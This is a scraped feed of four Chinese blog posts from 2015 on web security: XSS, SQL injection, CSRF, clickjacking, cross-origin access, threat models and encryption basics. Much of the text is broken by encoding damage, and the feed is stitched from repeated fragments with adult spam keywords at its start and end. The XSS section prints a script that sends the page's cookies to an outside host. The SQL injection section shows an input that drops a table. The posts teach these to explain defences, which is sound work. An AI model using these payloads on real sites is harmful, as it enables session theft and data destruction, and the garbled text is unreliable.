日韩特级毛片,最近看过的日韩成人,精品久久久国产

Web安全技�?4)-常见的攻��d��防�M

老林 — Sat, 25 Apr 2015 07:40:00 GMT

对于一个Web应用来说�Q�可能会面��很多不同的攻凅R��下面的内容��介�l�一些常见的��d��Ҏ��Q�以及面对这些攻�ȝ��防�M手段�?/p>

一、跨站脚本攻击（XSS�Q?/h2>

跨站脚本��d��的英文全�U�是Cross Site Script�Q��ؓ了和样式表区分，�~�写为XSS。发生的原因是网站将用户输入的内容输出到��面上，在这个过�E�中可能有恶意代码被��览器执行�?/p>

跨站脚本��d��可以分�ؓ两种�Q?/p>

1). 反射型XSS

它是通过�׃��用户打开一个恶意链接，服务端将链接中参数的恶意代码渲染到页面中�Q�再传递给用户由浏览器执行�Q�从而达到攻�ȝ��目的。如下面的链接：

http://a.com/a.jsp?name=xss

a.jsp��页面渲染成下面的html�Q?/p>

Hello xss

�q�时��览器将会弹出提�C�框�?/p>

2). 持久型XSS

持久型XSS��恶意代码提交给服务器，�q�且存储在服务器端，当用戯��问相兛_��Ҏ��再渲染到��面中，以达到攻�ȝ��目的�Q�它的危��x��大�?/p>

比如�Q�攻击者写了一��带恶意JS代码的博客，文章发表后，所有访问该博客文章的用户都会执行这�D�|��意JS�?/p>

Cookie劫持

Cookie中一般保存了当前用户的登录凭证，如果可以得到�Q�往往意味着可直接进入用户帐��P��而Cookie劫持也是最常见的XSS��d��。以上面提过的反��型XSS的例子来��_��可以像下面这��h��作：

首先�׃��用户打开下面的链接：

http://a.com/a.jsp?name=xss

用户打开链接后，会加载b.js�Q��ƈ执行b.js中的代码。b.js中存储了以下JS代码�Q?/p>

var img = document.createElement("img"); img.src = "http://b.com/log?" + escape(document.cookie); document.body.appendChild(img);

上面的代码会向b.com��h��一张图片，但实际上是将当前��面的cookie发到了b.com的服务器上。这样就完成了窃取cookie的过�E��?/p>

防�MCookie劫持的一个简单的�Ҏ��是在Set-Cookie时加上HttpOnly标识�Q�浏览器��止JavaScript讉K��带HttpOnly属性的Cookie�?/strong>

XSS的防�?/h3>
1). 输入��?/strong>
对输入数据做��查，比如用户名只允许是字母和数字�Q�邮��必��L��指定格式。一定要在后台做��查，否则数据可能�l�过前端��查直接发�l�服务器。一般前后端都做��查，�q�样前端可以挡掉大部分无效数据�?/p>
对特�D�字�W�做�~�码或过滤，但因��Z��知道输出时的语境�Q�所以可能会做不适当的过滤，最好是在输出时具体情况具体处理�?/p>
2). 输出��?/strong>
�Ҏ��染到HTML中内�Ҏ��行HtmlEncode�Q�对渲染到JavaScript中的内容执行JavascriptEncode�?/p>
另外�q�可以��用一些做XSS��查的开源项目�?/p>
二、SQL注入
SQL注入常常会听刎ͼ�它与XSS�c�M��Q�是�׃��用户提交的数据被当成命��o来执行而造成的。下面是一个SQL注入的例子：
String sql = "select * from user where username = '" + username + "'";
像上面的SQL语句�Q�如果用��h��交的username参数是leo�Q�则数据库执行的SQL为：
select * from user where username = 'leo'
但如果用��h��交的username参数是leo’; drop table user–�Q�那执行的SQL为：
select * from user where username = 'leo'; drop table user--'
在查询数据后�Q�又执行了一个删除表的操作，�q�样的后果非�怸�重�?/p>
SQL注入的防�?/h3>
防止SQL注入最好的�Ҏ��是��用预�~�译语句�Q�如下面所�C�：
String sql = "select * from user where username = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); ResultSet results = pstmt.executeQuery();
不同语言的预�~�译�Ҏ��不同�Q�但基本都可以处理�?/p>
如果遇到无法使用预编译方法时�Q�只能像防止XSS那样对参数进行检查和�~�码�?/p>
三、跨站请求伪造（CSRF�Q?/h2>
跨站��h��伪造的英文全称是Cross Site Request Forgery�Q�是�׃��操作所需的所有参数都能被��d��者得刎ͼ��q�而构造出一个伪造的��h��Q�在用户不知情的情况下被执行。看下面一个例子：
如果a.com�|�站需要用��L��录后可以删除博客�Q�删除博客的��h��地址如下�Q?/p>
GET http://a.com/blog/delete?id=1
当用��L��录a.com后，又打开了http://b.com/b.html�Q�其中有下面的内容：

�q�时会以用户在a.com的��n份发送http://a.com/blog/delete?id=1�Q�删除那��博客�?/p>
CSRF的防�?/h3>
验证�?/li>
CSRF是在用户不知情的情况下构造的�|�络情况�Q�验证码则强制用户与应用交互�Q�所以验证码可以很好得防止CSRF。但不能什么请求都加验证码�?/p>
referer��?/li>
��查请求header中的referer也能帮助防止CSRF��d��Q�但服务器不是总能拿到referer�Q�浏览器可能��Z��安全或隐�U�而不发送referer�Q�所以也不常用。倒是囄��防盗链中用得很多�?/p>
Anti CSRF Token
更多的是生成一个随机的token�Q�在用户提交数据的同时提交这个token�Q�服务器端比对后如果不正��，则拒�l�执行操作�?/p>
四、点��d��持（ClickJacking�Q?/h2>
点击劫持是从视觉上欺骗用戗��攻击者��用一个透明的iframe覆盖在一个网��上�Q�诱使用户在该网��上操作�Q�而实际点��d��是点在透明的iframe��面�?/p>
点击劫持延��Z��很多��d��方式�Q�有囄��覆盖��d��、拖拽劫持等�?/p>
点击劫持的防�?/h3>
针对iframe的攻击，可��用一个HTTP��_��X-Frame-Options�Q�它有三�U�可选��|��
DENY�Q?��止��M��面的frame加蝲�Q?/li>
SAMEORIGIN�Q�只有同源页面的frame可加载；
ALLOW-FROM�Q�可定义允许frame加蝲的页面地址�?/li>
针对囄��覆盖��d��Q�则注意使用预防XSS的方法，防止HTML和JS注入�?/p>

微信订阅��P��
原文地址�Q?a title="http://blog.gopersist.com/2015/04/25/web-security-4/">http://blog.gopersist.com/2015/04/25/web-security-4/

老林 2015-04-25 15:40 发表评论

Web安全技�?3)-��览器的跨域讉K��

老林 — Tue, 21 Apr 2015 16:15:00 GMT

一、浏览器介绍
对于Web应用来说�Q�浏览器是最重要的客��L��?/p>
目前��览器五花八门多得不得了�Q�除了Chrome、IE、Firefox、Safari、Opera�q�些国外的浏览器外，癑ֺ�、腾讯�?60、淘宝、搜狗、傲�怹��cȝ��Q�反正能做的都做了�?/p>
��览器虽然这么多�Q�但��览器内�怸�要就以下4�U�：
Trident�Q�IE使用的内核�?/li>
Gecko�Q�Firefox使用的内核�?/li>
WebKit�Q�Safair和Chrome使用的内核。WebKit��p��果发明，Chrome也用了，但是Google又开发了V8引擎替换掉了WebKit中的Javascript引擎�?/li>
Presto�Q�Opera使用的内核�?/li>
国内的浏览器基本都是双核��览器，使用��Z��WebKit的内栔R��速浏览常用网站，使用Trident内核兼容�|�银�{�网站�?/p>
二、同源策�?/h2>
同源�{�略是浏览器最基本的安全策略，它认��Z�Q何站点的内容都是不安全的�Q�所以当脚本�q�行�Ӟ��只被允许讉K��来自同一站点的资源�?/p>
同源是指域名、协议、端口都相同�?/p>
如果没有同源�{�略�Q�就会发生下面这��L��问题�Q?/p>
恶意�|�站用一个iframe把真实的银行��d��|��C��的页面上�Q�当用户使用用户名密码登录时�Q�父��面的javascript��可以读取到银行��d��表单中的内宏V�?/p>
甚至��览器的1个Tab��|��开了恶意网站，另一个Tab��|��开了银行网站，恶意�|�站中的javascript可以��d��到银行网站的内容。这样银行卡和密码就能被��L��拿走�?/p>
三、跨域访�?/h2>
�׃��同源�{�略的原因，��览器对跨域讉K��做了很多限制�Q�但有时我们的确需要做跨域讉K��Q�那要怎么办？主要有以下几�U�情况：
1. iframe的跨域访�?/h3>
同域名下�Q�父��面可以通过document.getElementById(‘_iframe’).contentWindow.document讉K��子页面的内容�Q�但不同域名下会出现�c�M��下面的错误：
Uncaught SecurityError: Blocked a frame with origin “http://a.com” from accessing a frame with origin “http://b.com”. Protocols, domains, and ports must match.
有两�U�解��x��法：
1). 当主域名相同�Q�子域名不同�Ӟ��比较�Ҏ��解决�Q�只需讄��相同的document.domain卛_��?/p>
如http://a.a.com/a.html使用iframe载入http://b.a.com/b.html�Q�且在a.html中有Javascript要修改b.html中元素的内容�Ӟ��可以像下面的代码那样操作�?/p>
a.html
b.html
b.html
2). 当主域名不同�Ӟ��非帔R��烦了。大致的�Ҏ��像下面描�q�的那样�Q?/p>
a.com下有a.html�Q?/li>
a.html创徏iframe加蝲b.com下的b.html�Q�可在加载b.html旉��过?�?��参��C��递到b.html中；
b.html加蝲后，可以通过提取location.search或location.hash中的内容获取a.html传过来的参数�Q?/li>
b.html创徏一个iframe�Q�加载a.com下的c.html�Q��ƈ且参��C��通过?�?传给c.html�Q?/li>
因�ؓc.html和a.html是相同域名，所以c.html可以使用parent.parent讉K��到a.html的对象，�q�样也就可以��b.html需要传递的参数传回到a.html中�?/li>
2. Ajax的跨域访�?/h3>
Ajax主要通过XMLHttpRequest对象实现�Q�但是如果通过XMLHttpRequest讉K��不同域名下的数据�Q�浏览器会出现类��g��面的错误�Q?/p>
XMLHttpRequest cannot load http://b.com/demo/iframe/ajax/b.html. No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘http://a.com’ is therefore not allowed access.
�q�时可由以下两种�Ҏ��解决�Q?/h4>
1). 使用

a.html

b.js
update_p("content from b.js");
在实际��用中�Q�通常a.html会将update_p以callback参数名传递给b.com的服务器�Q�服务器动态生成数据后�Q�再用callback参数值包��h��作�ؓ响应回传�l�a.html�?/p>
2). 在b.com的服务器�q�回信息中增加以下头信息�Q?/p>
Access-Control-Allow-Origin: http://a.com
Access-Control-Allow-Methods: GET
此时��览器便允许a.com��d��使用GET��h��b.com的内宏V�?/p>
对于flash来说�Q�会要求在网站根目录下放一个名为crossdomain.xml的文�Ӟ��以指明允许访问的域名来源。文件中的内容类��g��面的样子�Q?/em>
3. 使用HTML5的postMessage�Ҏ��实现跨域讉K��
HTML5增加了跨文档消息传输�Q�下面的例子实现了��用postMessage在不同域间传递消息：
a.html
b.html
b.html
在postMessage中要指定接收方的域名�Q�如果发现目标页面的域名不正��，��抛出类��g��面这��L��错误�Q?/p>
Failed to execute ‘postMessage’ on ‘DOMWindow’: The target origin provided (‘http://c.com’) does not match the recipient window’s origin (‘http://b.com’).
��览器对跨域讉K��的限制是��Z��安全考虑的，所以在使用一些方法实现跨域访问时要特别小心�?/em>
微信订阅��P��
源文地址�Q?a >http://blog.gopersist.com/2015/04/22/web-security-3/

老林 2015-04-22 00:15 发表评论

Web安全技�?2)-安全概述

老林 — Fri, 17 Apr 2015 15:47:00 GMT

一、安全的要素
信息安全的核心问题是要保障数据的合法使用者能够在��M��需要该数据时获得保密的�Q�没有被非法更改�q�的数据。主要有以下几要素：
机密�?/p>
保证数据内容不能泄露�?/li>
用户的密码用明文保存�Q�就破坏了机密性�?/em>
完整�?/p>
保证数据内容不被��改�?/li>
使用HTTP提交数据�Ӟ��数据在传输过�E�中被篡改后再发往服务器，��q��坏了完整性�?/em>
可用�?/p>
保证数据可被正常讉K��和��用�?/li>
像拒�l�服务攻击（DoS�Q�就是破坏了可用性�?/em>
最基本的安全要素就上面三个�Q�下面还有一些其他的�?/strong>
可审计�?/p>
记录�Ҏ��据��生的操作�Q�用于日后的分析、审查�?/li>
不可抵赖�?/p>
首先要保证数据完整性，然后�Q�在传输的数据中必须携带用于�w�䆾识别的信息，且这部分信息在不同主体间不能发生��撞�?/li>
加密技术的使用
上一��?a style="color: #1756a9; text-decoration: none;">《Web安全技�?1)-对加密机制的理解�?/a>中提��C��三类加密��法�Q�可以应用于某些要素的安全保障。如下面的说明：
对称加密
可保障机密性，�Ҏ��据加密后存储�Q�可以��没有密钥的�h员无法获取数据内宏V�?/li>
非对�U�加�?/strong>
可以�Ҏ��据进行加密解密操作，所以也能像对称加密一样保障机密性；
因�ؓ非对�U�加密可以实现数字签名，所以可以保证数据完整性。另外，�׃��是��用私钥签名，而私钥只有数据发送方才有�Q�所以如果公钥可以验�{�成功，则发送方不可抵赖�?/li>
摘要加密
摘要��法可保障数据完整性�?/p>
在某些网站的软�g下蝲��面里，有时除了下蝲地址�Q�旁边还会有一个MD5码。这个MD5��是对下载的软�g做的摘要加密。在下蝲完成后，在本机对下蝲的��Y件做MD5�Q�然后和�|�站上显�C�的MD5做比较，如果相同��p��C��Y件被成功下蝲�Q�而且下蝲�q�程中��Y件内�Ҏ��有被��改�?/em>
在做�pȝ��Ӟ��我们也经�怼�对密码做摘要加密后再保存�Q�因为摘要加密的一个特性是不可逆，�q�样通过数据库中保存的加密后的密码不可能�q�原成用��L��真实密码。而用��L��录时�Q�只需��用��h��交的密码再做摘要加密�Q�然后与数据库中保存的密码比较，��p��判断用户有没有输入正��的密码�?/em>
二、风险分�?/h2>
对于数据可能会遇��C��么威胁，一般是拍脑袋想一惻I��也可以��用模型帮忙，下面是一个叫STRIDE的威胁模型：
如何评估风险�Q?/h3>
数据受到威胁��可能造成损失�Q�但损失有大有小�Q�威胁发生的概率也有高有低，我们要结合具体情冉|��寚w��险做出判断。有一个叫DREAD的模型，可以指导我们如何判断威胁的风险程度�?/p>
每一个因素都分高、中、低三个�{��Q�权重值分别�ؓ3�?�?�?/p>
当有一个威胁时�Q�我们将它在每一个因素中的权重值相加，卛_��得出风险�p�L��?/p>
假如我们寚w��险系数范围的定义如下�Q?/p>
高危�Q?2~15分，中危�Q?~11分，低危�Q?~7分�?/p>
那如果以使用明文保存密码��Z��Q�风险系数可能像下面�q�样计算�Q?/p>
风险 = D(3) + R(1) + E(1) + A(3) + D(1) = 9分，�q�就是一个中危风险�?/p>
后箋对威胁的处理�Q�应当根据风险的大小和修复的难易�E�度做出�q��?br />
微信订阅��P��
源文地址�Q?a title="http://blog.gopersist.com/2015/04/17/web-security-2/">http://blog.gopersist.com/2015/04/17/web-security-2/

老林 2015-04-17 23:47 发表评论

Web安全技�?1)-对加密机制的理解

老林 — Mon, 13 Apr 2015 13:51:00 GMT

加密��法
数据加密��法有对�U�加密、非对称加密和信息摘要三�c�R�?/p>
对称加密是��用单个密钥对数据�q�行加密和解密。有DES、AES、RC-5�{�算法�?/p>
非对�U�加密是使用一对密�?公钥和私�?�Ҏ��据进行加密和解密。有RSA、ECC�{�算法。非对称加密大概比对�U�加密慢100倍以上�?/p>
通常的用法如下：
使用公钥加密数据�Q��用私钥解密数据�?/li>
使用�U�钥�{�֐�数据�Q��用公钥验证签名�?/li>
信息摘要如果也算加密��法的话�Q�它的加密过�E�不需要密钥，�q�且�l�过加密的数据无法被解密�Q�它是根据不定长的明文计��得��C��D�定长的数据。有MD5、SHA1�{�算法�?/p>
密钥规范
规范太多�Q�网上讲得很乱，挑常用的按我的理解列一下�?/p>
密钥格式�Q?/h4>
X.509�Q�通用的证书格式，包括公钥信息、用��h��识、签发信息等�?/li>
PKCS�pȝ��标准�Q�美国RSA数据安全公司及其合作伙伴制定的一�l�公钥密码学标准。其中PKCS#8描述�U�有密钥的信息格式，包括�U�钥及可选的属性集�{��?/li>
密钥存储�Q?/h4>
DER�Q�二�q�制�~�码�?/li>
PEM�Q�ASCII�~�码�?/li>
加密模式
块密码自�w�只能加密长度等于密码块长度的单块数据，若要对变长数据进行加密，则必��M��先将数据�q�行切分�Q�而且最后一个数据块需要适当的填充方式扩展到密码块的长度。加密模式即块密码的工作模式�Q�就是��用这些方式用同一个密钥对多于一块的数据�q�行加密�?/p>
加密模式通常用于对称加密�Q�也可以用于非对�U�加密。但非对�U�加密通常不适合加密较长的信息，所以会使用混合加密代替�?/p>
ps: 以RSA和DES��Z��Q��؜合加密通常使用DES先加密明文，再��用RSA的公钥加密DES的密钥，再将2个密文一起传递出厅R��接收方使用RSA的私钥解密DES的密钥信息，再��用DES的密钥解密具体内宏V�?/em>
最��单的加密模式是ECB�Q�即电子密码本）。其他还有CBC、PCBC、CFB�{��?/p>
ECB和CBC需要对最后一块进行填充，填充�Ҏ��有很多种�Q�最��单的是先在明文的最后填充空字符�Q��明文长度为密码块长度的整数倍�?br />
微信订阅��P��
源文地址�Q?a >http://blog.gopersist.com/2015/04/08/crypto/

老林 2015-04-13 21:51 发表评论

日韩特级毛片,最近看过的日韩成人,精品久久久国产

Web安全技�?4)-常见的攻��d��防�M

Cookie劫持

二、SQL注入

Web安全技�?3)-���览器的跨域讉K��

一、浏览器介绍

三、跨域访�?/h2>�׃��同源�{�略的原因，���览器对跨域讉K��做了很多限制�Q�但有时我们的确需要做跨域讉K���Q�那要怎么办？主要有以下几�U�情况：

有两�U�解��x��法：

3. 使用HTML5的postMessage�Ҏ��实现跨域讉K��

Web安全技�?2)-安全概述

一、安全的要素

加密技术的使用

Web安全技�?1)-对加密机制的理解

加密���法

密钥规范

密钥存储�Q?/h4>DER�Q�二�q�制�~�码�?/li>PEM�Q�ASCII�~�码�?/li>

加密模式

Web安全技�?3)-��览器的跨域讉K��

三、跨域访�?/h2>
�׃��同源�{�略的原因，��览器对跨域讉K��做了很多限制�Q�但有时我们的确需要做跨域讉K��Q�那要怎么办？主要有以下几�U�情况：

加密��法

密钥存储�Q?/h4>
DER�Q�二�q�制�~�码�?/li>
PEM�Q�ASCII�~�码�?/li>